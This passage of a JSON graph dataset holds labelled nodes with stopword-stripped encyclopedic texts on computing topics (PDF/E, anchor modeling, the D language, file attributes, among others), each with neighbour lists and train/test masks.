      9133,
      7983,
      6962,
      6718,
      2242,
      5830,
      5703,
      8262,
      5833,
      2519,
      11239,
      4840,
      363,
      5356,
      5741,
      7148,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 5149,
    "label": 9,
    "text": "PDF/E:pdf/e iso 24517-1:2008 iso standard published 2008 standard defines format pdf/e creation documents used geospatial construction manufacturing workflows ref name= pdf/e-iso-standard iso 24517-1:2008 document management -- engineering document format using pdf -- part 1 use pdf 1.6 pdf/e-1 /ref based pdf reference version 1.6 adobe systems specification also supports interactive media including animation 3d pdf/e subset pdf designed open neutral exchange format engineering technical documentation. ref name= pdf/e-ready-guide creating pdf/e-ready files /ref pdf/e standard specifies portable document format pdf used creation documents engineering workflows key benefits pdf/e include standard define method creation conversion paper electronic documents pdf/e format committee managing iso 24517 pdf/e needs subject-matter experts assist development part 2 standard iso 24517 pdf/e created meet needs organizations need reliably create exchange review engineering documentation however first part standard address 3d video dynamic content address integrated source data",
    "neighbors": [
      10752,
      8854,
      11036,
      9245,
      2206,
      5413,
      10413,
      11056,
      8627,
      3126,
      1079,
      5816,
      6977,
      8904,
      1610,
      9290,
      8524,
      2519,
      2904,
      4058,
      4064,
      8421,
      8426,
      5614,
      1010,
      3447,
      2045,
      10238
    ],
    "mask": "Test"
  },
  {
    "node_id": 5150,
    "label": 8,
    "text": "Unique_user:unique user according ifabc global web standards unique user uu ip address plus identifier term unique visitor may used instead unique user terms essentially meaning see sites may use user agent cookie and/or registration id note users allocated ip addresses dynamically example dial-up internet service providers definition may overstate understate real number individual users concerned unique users common way measuring popularity website often quoted potential advertisers investors website unique users usually measured standard period time typically month use performance indicators unique visitors/users controversial greg harmon belden research inferring many companies reporting online performance may overstate number unique visitors remember identifier computer person usually computer identified cookie often specific individual browser computer since increasing percentage people united states least access computer home work school one may divide reported total unique users half another increasing fraction people regularly delete cookies machines—presumably home work—and yet another large fraction use one browser machines means typical news site example people might typically visit day keep breaking news reported unique users might overstate number different people factor four plus side wishing impress advertisers investors reported number sessions visits pageviews probably accurate smaller group people visits much often looks pages raw numbers would suggest similar turf total unduplicated reach frequency metric often used television radio newspaper analyses unique users measure distribution content number distinct consumers common mistake using unique user numbers adding unique user numbers across dimensions unique user metric valid given set dimensions e.g time browsers example website may 100 unique users day day dimension particular week data one extrapolate number weekly unique users unique user count week 100 700 however website administrators track unique user traffic longer period time build reliable view performance direct competitors within sector online businesses tend static conversation rate ratio unique users new business clients calculating movement unique users conversion funnel time period must used every step unique user counts websites typically counted using cookies browser visits website website checks existence particular cookie cookie present cookie value captured cookie present website create cookie unique visitors refers number distinct individuals requesting pages website given period regardless often visit visits refer number times site visited matter many visitors make visits individual goes website tuesday wednesday recorded two visits one visitor purpose tracking unique visitors help marketers understand website user behavior visitor make multiple visits specified period number visits may greater number visitors visitor sometimes referred unique visitor unique user clearly convey idea visitor counted measurement users visitors requires standard time period distorted automatic activity bots classify web content estimation visitors visits traffic statistics usually filtered remove type activity eliminating known ip addresses bots requiring registration cookies using panel data",
    "neighbors": [
      5442,
      4167,
      3688,
      9768,
      9036,
      6576,
      113,
      8914,
      2996,
      7965
    ],
    "mask": "None"
  },
  {
    "node_id": 5151,
    "label": 1,
    "text": "Anchor_modeling:anchor modeling anchor modeling agile database modeling technique suited information changes time structure content provides graphical notation used conceptual modeling similar entity-relationship modeling extensions working temporal data modeling technique involves four modeling constructs anchor attribute tie knot capturing different aspects domain modeled resulting models translated physical database designs using formalized rules translation done tables relational database mostly sixth normal form anchor modeling created order take advantage benefits high degree normalization avoiding drawbacks advantages able non-destructively evolve model avoid null values keep information free redundancies gained performance issues due extra joins largely avoided thanks feature modern database engines called 'table elimination order handle changes information content anchor modeling emulates aspects temporal database resulting relational database schema earliest installations using anchor modeling made sweden first dating back 2004 data warehouse insurance company built using technique 2007 technique used data warehouses one oltp system presented internationally lars rönnbäck 2007 transforming data intelligence tdwi conference amsterdam stirred enough interest technique warrant formal description since research concerning anchor modeling done collaboration creators olle regardt lars rönnbäck team department computer systems sciences stockholm university first paper anchor modeling formalized presented 28th international conference conceptual modeling best paper award commercial web site provides material anchor modeling free use creative commons license online modeling tool also available free use open source anchor modeling four basic modeling concepts anchors attributes ties knots anchors used model entities events attributes used model properties anchors ties model relationships anchors knots used model shared properties states attributes ties historized changes information model need kept example model showing different graphical symbols concepts seen symbols resemble used entity–relationship modeling couple extensions double outline attribute tie indicates history changes kept knot symbol outlined square rounded edges also available anchor modeling handles two types informational evolution structural changes content changes changes structure information represented extensions high degree normalization makes possible non-destructively add necessary modeling concepts needed capture change way every previous schema always remains subset current schema since existing schema touched gives benefit able evolve database highly iterative manner without causing downtime changes content information done emulating similar features temporal database relational database anchor modeling pieces information tied points time intervals time open closed time points events occur modeled using attributes e g birth dates persons time purchase intervals time value valid captured historization attributes ties e g changes hair color person period time person married relational database achieved adding single column data type granular enough capture speed changes table corresponding historized attribute tie adds slight complexity one row table examined order know interval closed points intervals time directly related domain modeled points time information entered database handled use metadata anchor modeling rather mentioned constructs information changes database needs kept bitemporal anchor modeling used addition updates also delete statements become non-destructive anchor modeling one-to-one mapping symbols used conceptual model tables relational database every anchor attribute tie knot corresponding table database unambiguously defined structure conceptual model thereby translated relational database schema using simple automated rules vice versa different many modeling techniques complex sometimes subjective translation steps conceptual logical physical levels anchor tables contain single column identities stored identity assumed property entity always present immutable identities rarely available domain modeled instead technically generated e g incrementing number sequence example anchor identities nephews donald duck set 1-tuples codice_1 knots thought combination anchor single attribute knot tables contain two columns one identity one value due storing identities values together knots historized usefulness comes able reduce storage requirements improve performance since tables referencing knots store short value rather long string example knot genders set 2-tuples codice_2 static attribute tables contain two columns one identity entity value belongs one actual property value historized attribute tables extra column storing starting point time interval knotted attribute table value column identity references knot table example static attribute names set 2-tuples codice_3 example knotted static attribute genders set 2-tuples codice_4 example historized attribute changing colors outfits set 3-tuples codice_5 static tie tables relate two anchors contain two columns storing identities historized tie tables extra column storing starting point time interval knotted tie tables additional column referenced knot example static tie sibling relationship set 2-tuples codice_6 resulting tables sixth normal form except ties columns part primary key",
    "neighbors": [
      2369,
      5794,
      10145,
      11457,
      9893,
      9286,
      5320,
      2512,
      10737,
      9075,
      2901,
      7767,
      3001,
      3004,
      5151
    ],
    "mask": "Test"
  },
  {
    "node_id": 5152,
    "label": 3,
    "text": "Gyrodine:gyrodine note player fire guns time",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "Train"
  },
  {
    "node_id": 5153,
    "label": 4,
    "text": "Jeffrey_Carney:jeffrey carney jeffrey martin carney former united states air force intelligence specialist convicted spying east german ministry state security mfs stasi one stasi successful spies code-named kid uwe carney became alienated angry u.s. air force u.s. policies president ronald reagan began handing u.s. military documents stasi working west berlin u.s. air force transfer back goodfellow air force base 1984 carney decided request permanent asylum east germany whereabouts remained unknown 1990 carried rolls deserter carney finally apprehended fall berlin wall special agents united states air force office special investigations afosi april 22 1991 pintschstrasse 12 friedrichshain district berlin carney entered u.s. air force december 1980 april 1982 april 1984 assigned 6912th electronic security group electronic security command tempelhof central airport berlin linguist intelligence specialist duty station 6912th marienfelde field site zdf film informationen um jeden preis carney admitted homosexuality primary reason became spy carney quickly became disillusioned air force intelligence gathering operations several stories attempting turn badge quit protest first-hand experiences nato exercise able archer 83 strengthened resolve help avoid nuclear conflict later lonely alienated psychological stress felt one talk problems intended defect east germany first crossing allowed drawn espionage east german intelligence agents expertly manipulated claimed complete loyalty working marienfelde field site berlin carney began copying classified documents provided stasi repeatedly crossing back forth east germany 1984 involuntarily transferred goodfellow air force base texas work technical instructor carney believed goodfellow training base real-world intelligence interest stasi soon discovered wrong carney continued providing stasi documents meeting handlers mexico city rio de janeiro 1985 feeling cut supervisors east berlin increasing risk became known year spy sought protection east german embassy mexico city flown havana assistance cuban government weeks later returned east berlin via prague continued work stasi hva abt xi ha iii intercepting translating non-secure telephone communications u.s. military commanders well east german telephone lines dedicated u.s. embassy east berlin course spying carney provided stasi eastern bloc intelligence services one hundred top-secret u.s. military documents services east germany awarded nva service medal bronze medal waffenbrüderschaft brotherhood arms gold internal stasi file shows value work performed stasi kgb earning praise kgb general chebrikov well general zaitsev group soviet forces germany gsfg break case came fall berlin wall november 1989 many stasi records became available foreign investigators journalists april 1991 carney located help least two former stasi intelligence officers turned informants preparation apprehension quickly assigned 7350th air base group former base tempelhof central airport several months apprehension ironically assignment official unintended consequence assigning carney unit supported desert shield/desert storm 1991 result carney received national defense service medal solitary confinement fort leavenworth kansas several years later 22 april 1991 carney apprehended public street afosi agents near residence pintschstraße 12 friedrichshain used soviet sector berlin immediately following apprehension taken tempelhof airport identified underwent nearly 28 hours intense interrogation carney refused answer questions repeated requests counsel denied point afosi consultation u.s. agencies decided quietly remove carney german territory secretly flown united states aboard military aircraft following day carney arrest return united states coordinated highest levels united states government without consulting german officials u.s ambassador federal republic germany vernon walters personally acted adviser commander-in-chief united states air forces europe urging haste carney pleaded guilty charges espionage conspiracy desertion sentenced december 1991 38 years prison carney served mandatory portion sentence quantico virginia later united states disciplinary barracks fort leavenworth kansas carney released 2002 serving 11 years seven months twenty days twenty-year sentence accordance pretrial agreement release prison carney attempted return germany claiming german citizen however east germany never naturalized citizen thus obtained german passport fraudulently german authorities refused grant passport reported living ohio november 2011 carney submitted lengthy manuscript detailing life spy united states air force security review numerous delays manuscript finally cleared july 26 2012 book enemies american cold war journey published 2013",
    "neighbors": [
      1639
    ],
    "mask": "None"
  },
  {
    "node_id": 5154,
    "label": 9,
    "text": "Runtime_library:runtime library computer programming runtime library rtl set low-level routines used compiler invoke behaviors runtime environment inserting calls runtime library compiled executable binary runtime environment implements execution model built-in functions fundamental behaviors programming language execution run time computer program execution calls runtime library cause communication executable binary runtime environment runtime library often includes built-in functions memory management exception handling therefore runtime library always specific platform compiler runtime library may implement portion runtime environment behavior one reads code calls available typically thin wrappers simply package information send runtime environment operating system however sometimes term runtime library meant include code runtime environment even though much code directly reached via library call example language features performed efficient accurate runtime implemented runtime environment may invoked via runtime library api e.g logic errors array bounds checking dynamic type checking exception handling possibly debugging functionality reason programming bugs discovered program tested live environment real data despite sophisticated compile-time checking testing performed development another example runtime library may contain code built-in low-level operations complicated inlining compilation implementations arithmetic operations directly supported targeted cpu various miscellaneous compiler-specific operations directives concept runtime library confused ordinary program library like created application programmer delivered third party dynamic library meaning program library linked run time example c programming language requires minimal runtime library commonly called codice_1 defines large standard library called c standard library provided implementation",
    "neighbors": [
      1409,
      7173,
      8069,
      6664,
      5514,
      3980,
      4112,
      9490,
      6555,
      5663,
      1952,
      8609,
      7462,
      9981,
      5165,
      7983,
      1715,
      2620,
      1348,
      8262,
      8136,
      6477,
      10703,
      3413,
      2519,
      8280,
      2138,
      6112,
      3553,
      1122,
      7904,
      8037,
      10470,
      1384,
      4592,
      5872,
      9714,
      2804,
      7292,
      7421,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 5155,
    "label": 2,
    "text": "Python_Package_Manager:python package manager python package manager pypm python utility intended simplify tasks locating installing upgrading removing python packages determine recent version software package installed system install upgrade package local remote host pypm non-free may used activestate activepython distribution pypm uses “ pypm repositories ” collections pre-compiled packages repositories contain high variety modules published pypi pypm inspired perl package manager ppm",
    "neighbors": [
      8068,
      9487,
      788,
      1813,
      8213,
      10900,
      8476,
      4775,
      6828,
      5819,
      190,
      9671,
      5578,
      5067,
      3918,
      463,
      3667,
      4309,
      6361,
      2010,
      2401,
      1379,
      741,
      231,
      6119,
      9063,
      8554,
      7293
    ],
    "mask": "None"
  },
  {
    "node_id": 5156,
    "label": 2,
    "text": "John_Mashey:john mashey john r. mashey born 1946 us computer scientist director entrepreneur mashey holds ph.d. computer science pennsylvania state university developed assist assembler language teaching software worked pwb/unix operating system bell labs 1973 1983 authoring pwb shell also known mashey shell moved silicon valley join convergent technologies ending director software joined mips computer systems early 1985 managing operating systems development helping design mips risc architecture well specific cpus systems software continued similar work silicon graphics 1992–2000 contributing design numaflex modular computer architecture using numalink ending vp chief scientist mashey one founders standard performance evaluation corporation spec benchmarking group acm national lecturer four years guest editor ieee micro one long-time organizers hot chips conferences chaired technical conferences operating systems cpu chips gave public talks software engineering risc design performance benchmarking supercomputing credited first spread term concept big data 1990s became consultant venture capitalists high-tech companies trustee computer history museum 2008 2012 received usenix lifetime achievement award flame award contributions unix community since early days written articles skeptical inquirer regarding climate change denial 2010 published 250-page critical report wegman report mashey report concluded wegman report contained plagiarized text story featured usa today interviewed science magazine stated spending retirement years compiling voluminous critiques calls 'real conspiracy produce 'climate antiscience research investigated secretive funding climate contrarian thinktanks mashey blogs desmogblog focuses global warming mashey became scientific technical consultant committee skeptical inquiry 2015 mashey married angela hey cambridge university waterloo university graduate ph.d. imperial college london",
    "neighbors": [
      7234,
      10051,
      8260,
      1702,
      5160,
      9391,
      11442,
      2132,
      5492,
      5272,
      4859,
      8671
    ],
    "mask": "Test"
  },
  {
    "node_id": 5157,
    "label": 4,
    "text": "Cooperative_database:cooperative database cooperative database type database holds information customers transactions many companies contribute information database return aggregate information customers companies provided databases used promotional mailings credit card fraud detection fighting e-mail spam alternatively term cooperative database used describe database systems incorporate techniques aid users beyond returning direct answers databases example give explanations query returns results detect report user misconception suggested query provide justifications returned answers relax query attributes find close non-precise answers fundamental goal extend databases towards reflecting cooperative principle particular avoid misleading users omission pertinent contextual detail",
    "neighbors": [
      2369,
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 5158,
    "label": 6,
    "text": "File_attribute:file attribute file attributes metadata associated computer files define file system behavior attribute one two states set cleared attributes considered distinct metadata dates times filename extensions file system permissions addition files folders volumes file system objects may attributes traditionally ms-dos microsoft windows four attributes archive hidden read-only system windows added new ones systems derived 4.4bsd-lite freebsd netbsd openbsd dragonfly bsd macos sets system user attributes newer versions linux kernel also support set file attributes traditionally dos microsoft windows files folders accepted four attributes new versions windows came microsoft added inventory available attributes ntfs file system including limited attributes displayed attributes column windows explorer include 4.4bsd 4.4bsd-lite files directories folders accepted four attributes could set owner file superuser user attributes two attributes could set superuser system attributes freebsd added additional attributes also supported dragonfly bsd freebsd also supports whereas dragonfly bsd supports netbsd added another attribute also supported openbsd macos added three attributes dos os/2 windows codice_3 command cmd.exe command.com used change display four traditional file attributes file explorer windows show seven mentioned attributes set clear system attribute windows powershell become component windows 7 later features two commands read write attributes codice_4 codice_5 change attribute file windows nt user must appropriate file system permissions known write attributes write extended attributes 4.4bsd 4.4bsd-lite derivatives codice_6 codice_7 commands used change display file attributes change user attribute file 4.4bsd-derived operating systems user must owner file superuser change system attribute user must superuser linux codice_8 codice_9 commands used change display file attributes",
    "neighbors": [
      2560,
      5120,
      2564,
      6155,
      6669,
      3598,
      10257,
      7187,
      9236,
      6677,
      5142,
      8214,
      10774,
      25,
      10776,
      3611,
      4637,
      9249,
      9762,
      4643,
      6180,
      7217,
      10803,
      52,
      7225,
      10809,
      11323,
      576,
      2625,
      8772,
      4170,
      7244,
      6221,
      1109,
      3160,
      10333,
      97,
      11363,
      4708,
      6760,
      10856,
      9835,
      9836,
      7789,
      8301,
      9840,
      7285,
      9333,
      4727,
      6263,
      9335,
      634,
      1147,
      3197,
      1150,
      5247,
      9343,
      11390,
      2179,
      10883,
      5115,
      5256,
      7818,
      10891,
      6797,
      654,
      10382,
      2193,
      2194,
      2197,
      2199,
      6296,
      2201,
      9370,
      9882,
      11419,
      6813,
      9887,
      6309,
      1190,
      5286,
      10405,
      1193,
      5293,
      8879,
      7344,
      178,
      9907,
      6837,
      2230,
      5816,
      6329,
      8889,
      700,
      1212,
      8380,
      5823,
      3265,
      8388,
      10951,
      1736,
      2248,
      9420,
      5840,
      7378,
      3795,
      4819,
      8402,
      6358,
      7382,
      728,
      8404,
      8410,
      9436,
      6365,
      1247,
      11489,
      739,
      7907,
      8938,
      7403,
      1263,
      3312,
      242,
      2291,
      3826,
      5363,
      246,
      3834,
      9466,
      9468,
      1278,
      3328,
      3330,
      11012,
      7431,
      2314,
      1804,
      8461,
      3856,
      273,
      1810,
      787,
      6416,
      789,
      5397,
      6935,
      8976,
      8977,
      10522,
      11033,
      8988,
      287,
      10016,
      1825,
      6434,
      292,
      5413,
      3366,
      10235,
      3368,
      2345,
      4907,
      9004,
      302,
      7983,
      5425,
      6961,
      2355,
      1844,
      6963,
      7477,
      823,
      10036,
      4409,
      6970,
      6459,
      7483,
      9533,
      7999,
      11072,
      11075,
      3909,
      4423,
      2378,
      5452,
      6988,
      4431,
      5457,
      5969,
      7507,
      5975,
      7511,
      346,
      2395,
      2397,
      3426,
      10596,
      2407,
      8551,
      10087,
      5484,
      7020,
      11635,
      5492,
      2933,
      7540,
      6519,
      376,
      10101,
      890,
      11128,
      11638,
      8573,
      7039,
      2432,
      8063,
      7554,
      10113,
      8069,
      394,
      3978,
      4492,
      5514,
      7565,
      8075,
      6545,
      7057,
      5013,
      11675,
      11676,
      414,
      2462,
      2974,
      5022,
      7070,
      421,
      1445,
      935,
      10151,
      4521,
      9643,
      4012,
      4525,
      1454,
      6062,
      11184,
      7601,
      8114,
      7603,
      10676,
      950,
      8631,
      1464,
      954,
      1978,
      6078,
      9151,
      3522,
      8643,
      11204,
      11205,
      4040,
      8136,
      9166,
      7126,
      2015,
      1509,
      9189,
      3562,
      10730,
      10731,
      6126,
      7663,
      6128,
      5105,
      8687,
      3571,
      5619,
      11256,
      2555,
      3582,
      10751
    ],
    "mask": "Test"
  },
  {
    "node_id": 5159,
    "label": 7,
    "text": "CtrlS:ctrls ctrls tier-4 datacenter india headquartered hyderabad deals large group networked computer servers typically used various organizations remote storage processing distribution large amounts data large groups remote servers networked allow centralized data storage online access computer services resources ctrls belongs industry hyderabad branches mumbai delhi ctrls datacenters founded 2008 hyderabad india established aim keep online applications data secure provide network storage services various organizations sridhar pinnapureddy founder ceo ctrls spearheaded 200 innovations energy management dc infra cloud disaster recovery also founder chairman pioneer group companies interests internet services infrastructure picked recognitions outstanding entrepreneur year – 2010 asia pacific region apea rajiv gandhi shiromani global economic council karamveer puraskar 2007 awarded icongo accomplishments contributions society ctrls developed capabilities provide platform level services include data center infrastructure storage backup hardware os layers network security layers offers services disaster recovery demand managed services private cloud-on-demand enable clients make paradigm shift captive datacenter model outsourced one tier 4 data centers ctrls located hyderabad mumbai delhi bangalore headquarters hyderabad",
    "neighbors": [
      6018,
      1539,
      8451,
      6027,
      4236,
      10893,
      526,
      911,
      272,
      1935,
      8592,
      405,
      2328,
      4377,
      8986,
      10265,
      5662,
      11038,
      5666,
      6307,
      9766,
      39,
      2217,
      6444,
      8495,
      3121,
      5681,
      9906,
      7352,
      10681,
      11070,
      448,
      4289,
      11201,
      8515,
      10820,
      3269,
      4683,
      4429,
      590,
      1102,
      7248,
      5202,
      467,
      9682,
      7512,
      10200,
      6618,
      6367,
      4194,
      11646,
      3428,
      5732,
      6632,
      1001,
      10090,
      2795,
      7660,
      8044,
      2170,
      253,
      8446,
      8191
    ],
    "mask": "Test"
  },
  {
    "node_id": 5160,
    "label": 9,
    "text": "ASSIST_(computing):assist computing assist assembler system student instruction systems teaching ibm system/370-compatible assembler interpreter developed early 1970s penn state university graham campbell john mashey plus student assistants late 1960s computer science education expanded rapidly university computer centers faced large growth usage students whose needs sometimes differed professionals batch processing environments needed run short programs decks punched cards fast turnaround minutes overnight programs often included syntax errors compiled would often fault quickly optimization flexibility far less important low overhead watfiv successful pioneering effort build fortran compiler tuned student use universities began running dedicated fast-batch memory partition small run-time limit 5 seconds ibm system/360 model 67 low limit enabled fast turnaround avoided waste time programs stuck infinite loops watfiv success helped inspire development assist pl/c student-oriented programs fit fast-batch model became widely used among universities assist enhanced promoted others northern illinois university wilson singletary ross overbeek university tennessee charles hughes charles pfleeger reported 1978 assist used 200+ universities 1980s niu new implementation ibm pcs assist/i interactive used computer scientist john ehrman teach boot camp course assembly programming share computing meetings least 2011 perhaps several years march 1 1998 penn state declared assist longer copyrighted program freely available per last release notes original assist code seems still get use seen 2017 demonstration video assembling source running mvs 3.8 emulation laptop ibm system/360 /370 computers used 24-bit addressing ignored high-order 8 bits assembly programmers era including wrote assist often saved precious memory using high-order 8 bits flags required compatibility mode ibm introduced 31-bit 64-bit addressing",
    "neighbors": [
      1952,
      5156,
      7053,
      7983,
      9714,
      3323,
      477
    ],
    "mask": "None"
  },
  {
    "node_id": 5161,
    "label": 0,
    "text": "Lexicase:lexicase lexicase type dependency grammar originally developed beginning early 1970s stanley starosta university hawaii dozens starosta graduate students also contributed theory wrote least 20 doctoral dissertations using lexicase analyze numerous languages asia japanese mandarin vietnamese thai khmer tagalog etc europe greek russian etc africa swahili yoruba lexicase monostratal x-bar grammar i.e transformational grammar words heads phrases i.e assumed empty phrases lexicase words features determine morphosyntactic distribution dependents primary goal lexicase provide simple transparent disprovable means testing cross-linguistic tendencies lexically focused theory lexicase used identify verb subcategories korean russian thai vietnamese noun subcategories khmer thai provide overall language description pacoh central vietnam regarding arguments clause structure used explore case greek mandarin chinese transitivity ergativity amis indigenous language taiwan proto-central pacific austronesian among topics",
    "neighbors": [
      4070
    ],
    "mask": "Test"
  },
  {
    "node_id": 5162,
    "label": 5,
    "text": "12-channel_carrier_system:12-channel carrier system u.s. telephone network 12-channel carrier system early frequency-division multiplexing system standard used carry multiple telephone calls single twisted pair wires mostly short medium distances system twelve voice channels multiplexed high frequency carrier passed balanced pair trunk line similar used individual voice frequency connections original system obsolete today multiplexing voice channels units 12 24 channels modern digital trunk lines t-1 legacy system twelve channel scheme first devised early 1930s provide line spectrum covering 60 108 khz type j carrier telephone system equivalent four wire two wire facilities open wire carrier used almost exclusively interstate long haul toll telephony became basic building block channel group succeeding long haul systems type k type l systems late 1970s long haul channel groups used single-sideband/suppressed carrier heterodyne scheme produced western electric type a-1 a-6 channel bank twelve channel scheme order maintain bandwidth routing compatibility carried short haul carriers well started developing eliminate voice band open wire trunk lines 1950s bell system vacuum-tube driven n-1 carrier early 1950s used twelve channel carrier system using double sideband/unsuppressed carrier operation n't need network timebase synchronization maintain frequency accuracy n-2 similar heterodyning scheme discrete transistorized plug-in unit architecture n3 used frequency plan scheme using single sideband different voice channel side carrier technique first seen 16 channel type open wire short haul carrier 1950s doubled capacity 24 channels basic digital type pcm carrier introduced late 1950s became now-ubiquitous t-1 digital world repeaters spaced approximately 6 miles 10 km apart depending wire gauge exceptions n-carriers used 19 gage unloaded toll pairs two-wire operation repeater either received directions low frequency band sent directions higher band vice versa frequency frogging allowed equivalent four-wire operation single cable pair two-wire operation period type n-1 widespread use lenkurt corporation owned controlled general telephone fielded variant competitor type bn bn used pairs repeaters bell n-cxr used four channel groups lower single-sideband heterodyning 24 channels per carrier later seen western electric type n-3 type bn used times bell operating companies 1956 hush-a-phone decision us supreme court landmark case challenged benign monopoly us telephone equipment industry part settlement bell operating companies buy use small amounts lenkurt collins microwave carrier systems california type bn used almost exclusively provide trunk private line connections pacific tel tel toll offices local general telephone end offices",
    "neighbors": [
      7490,
      2787,
      8811,
      3115,
      3156
    ],
    "mask": "None"
  },
  {
    "node_id": 5163,
    "label": 4,
    "text": "Anonymous_call_rejection:anonymous call rejection north american nanp telephone system anonymous call rejection acr landline calling feature screens calls callers blocked caller id information often free included caller id landlines may available separately local telephone company feature available cellphone services caller id sprint t-mobile usa verizon wireless provide service acr prevents dialing feature code successfully calling customer service verizon wireless currently provide blocked anonymous call rejection north america feature enabled vertical service code *77 disabled *87 anonymous call rejection service callers block number get recording saying accept blocked calls anonymous call rejection service callers block number reach",
    "neighbors": [
      11170,
      1518
    ],
    "mask": "None"
  },
  {
    "node_id": 5164,
    "label": 3,
    "text": "PalmPilot_Professional:palmpilot professional palmpilot professional personal digital assistant palmpilot released march 10 1997 updated version pilot 5000 delayed general availability professional model marketplace marketed compact design back-lit display ability quickly connect microsoft windows macintosh personal computer ability synchronize via cradle modem sold separately computer making possible send e-mails set appointments others set contact information various third party applications upirc enabled connecting various messaging systems including popular instant messaging services optional memory card ir port available upgrade directly palm",
    "neighbors": [
      2308,
      10500,
      6790,
      6797,
      3606,
      8982,
      6178,
      9013,
      694,
      1603,
      5318,
      3017,
      11337,
      9037,
      2258,
      1621,
      4832,
      4449,
      2285,
      2420,
      8952,
      9598
    ],
    "mask": "None"
  },
  {
    "node_id": 5165,
    "label": 9,
    "text": "D_(programming_language):programming language also known dlang multi-paradigm system programming language created walter bright digital mars released 2001 andrei alexandrescu joined design development effort 2007 though originated re-engineering c++ distinct language redesigned core c++ features also sharing characteristics languages notably java python ruby c eiffel design goals language attempt combine performance safety compiled languages expressive power modern dynamic languages idiomatic code commonly fast equivalent c++ code also shorter language whole memory-safe include optional attributes designed check memory safety type inference automatic memory management syntactic sugar common types allow faster development bounds checking design contract features concurrency-aware type system help reduce occurrence bugs designed lessons learned practical c++ usage rather purely theoretical perspective although uses many c c++ concepts also discards compatible c c++ source code however constrained design rule code legal c behave way gained features c++ example closures anonymous functions compile time function execution adds functionality c++ also implementing design contract unit testing true modules garbage collection first class arrays associative arrays dynamic arrays array slicing nested functions lazy evaluation re-engineered template syntax retains c++ ability perform low-level programming add inline assembler c++ multiple inheritance replaced java-style single inheritance interfaces mixins hand declaration statement expression syntax closely matches c++ inline assembler typifies differences application languages like java c inline assembler lets programmers enter machine-specific assembly code within standard code method often used system programmers access low-level features processor needed run programs interface directly underlying hardware operating systems device drivers built-in support documentation comments allowing automatic documentation generation supports five main programming paradigms imperative object-oriented metaprogramming functional concurrent actor model imperative programming almost identical c. functions data statements declarations expressions work c c runtime library may accessed directly hand notable differences c area imperative programming include codice_1 loop construct allows looping collection nested functions functions declared inside another may access enclosing function local variables object-oriented programming based single inheritance hierarchy classes derived class object support multiple inheritance instead uses java-style interfaces comparable c++ pure abstract classes mixins separates common functionality inheritance hierarchy also allows defining static final non-virtual methods interfaces metaprogramming supported combination templates compile time function execution tuples string mixins following examples demonstrate compile-time features templates written imperative style compared c++ functional style templates regular function calculates factorial number ulong factorial ulong n use codice_2 compile-time conditional construct demonstrated construct template performs calculation using code similar function template factorial ulong n following two examples template function defined used compute factorials types constants need specified explicitly compiler infers types right-hand sides assignments enum fact_7 factorial 7 example compile time function execution ordinary functions may used constant compile-time expressions provided meet certain criteria enum fact_9 factorial 9 codice_3 function performs codice_4-like data formatting also compile-time ctfe msg pragma displays result compile time import std.string format pragma msg format 7 fact_7 pragma msg format 9 fact_9 string mixins combined compile-time function execution allow generating code using string operations compile time used parse domain-specific languages code compiled part program import footod // hypothetical module contains function parses foo source code void main supports functional programming features function literals closures recursively-immutable objects use higher-order functions two syntaxes anonymous functions including multiple-statement form shorthand single-expression notation two built-in types function literals codice_5 simply pointer stack-allocated function codice_6 also includes pointer surrounding environment type inference may used anonymous function case compiler creates codice_6 unless prove environment pointer necessary likewise implement closure compiler places enclosed local variables heap necessary example closure returned another function exits function scope using type inference compiler also add attributes codice_8 codice_9 function type prove apply functional features currying common higher-order functions map filter reduce available standard library modules codice_10 codice_11 alternatively function compositions expressed using uniform function call syntax ufcs natural left-to-right reading import std.stdio std.concurrency std.variant void foo void main memory usually managed garbage collection specific objects may finalized immediately go scope explicit memory management possible using overloaded operators codice_12 codice_13 simply calling c malloc free directly garbage collection controlled programmers may add exclude memory ranges observed collector disable enable collector force either generational full collection cycle manual gives many examples implement different highly optimized memory management schemes garbage collection inadequate program safed name given subset guaranteed memory safe writes memory allocated already recycled functions marked codice_14 checked compile time ensure use features could result corruption memory pointer arithmetic unchecked casts functions called must also marked codice_14 codice_16 functions marked codice_16 cases compiler distinguish safe use feature disabled safed potential case memory corruption initially banners dip1000 dip25 part language specification provides protections certain ill-formed constructions involving lifetimes data current mechanisms place primarily deal function parameters stack memory however stated ambition leadership programming language provide thorough treatment lifetimes within programming language within safe code lifetime assignment involving reference type checked ensure lifetime assignee longer assigned example applied function parameter either pointer type references keywords return scope constrain lifetime use parameter standard dictates following behaviour annotated example given c application binary interface abi supported well c fundamental derived types enabling direct access existing c code libraries bindings available many popular c libraries additionally c standard library part standard d. microsoft windows access component object model com code takes permissive realistic approach interoperation c++ code code marked extern c++ following features specified c++ namespaces used via syntax extern c++ namespace namespace name c++ namespace c++ side using namespace std class base class derived public base int derived :mul int factor derived *createinstance int void deleteinstance derived side programming language official subset known better c subset forbids access features requiring use runtime libraries c accessed via- current implementations -betterc flag compilation better c may call code compiled flag linked code code compiled without better c option may call code compiled however lead slightly different behaviours due differences c handle asserts walter bright decided start working new language 1999 first released december 2001 reached version 1.0 january 2007 first version language d1 concentrated imperative object oriented metaprogramming paradigms similar c++ dissatisfied phobos official runtime standard library members community created alternative runtime standard library named tango first public tango announcement came within days 1.0 release tango adopted different programming style embracing oop high modularity community-led project tango open contributions allowed progress faster official standard library time tango phobos incompatible due different runtime support apis garbage collector threading support etc. made impossible use libraries project existence two libraries widely use led significant dispute due packages using phobos others using tango june 2007 first version d2 released beginning d2 development signalled stabilization d1 first version language placed maintenance receiving corrections implementation bugfixes d2 introduce breaking changes language beginning first experimental const system d2 later added numerous language features closures purity support functional concurrent programming paradigms d2 also solved standard library problems separating runtime standard library completion d2 tango port announced february 2012 release andrei alexandrescu book programming language 12 june 2010 marked stabilization d2 today commonly referred january 2011 development moved bugtracker patch-submission basis github led significant increase contributions compiler runtime standard library december 2011 andrei alexandrescu announced d1 first version language would discontinued 31 december 2012 final d1 release v1.076 31 december 2012 code official compiler digital mars compiler walter bright originally released custom license qualifying source available conforming open source definition 2014 compiler front-end re-licensed open source boost software license re-licensed code excluded back-end partially developed symantec 7 april 2017 entire compiler made available boost license symantec gave permission re-license back-end 21 june 2017 language accepted inclusion gcc gcc 9 language frontend merged gcc current implementations compile directly machine code efficient execution editors integrated development environments ides supporting include eclipse microsoft visual studio slickedit emacs vim scite smultron textmate monodevelop zeus geany among others open source ides 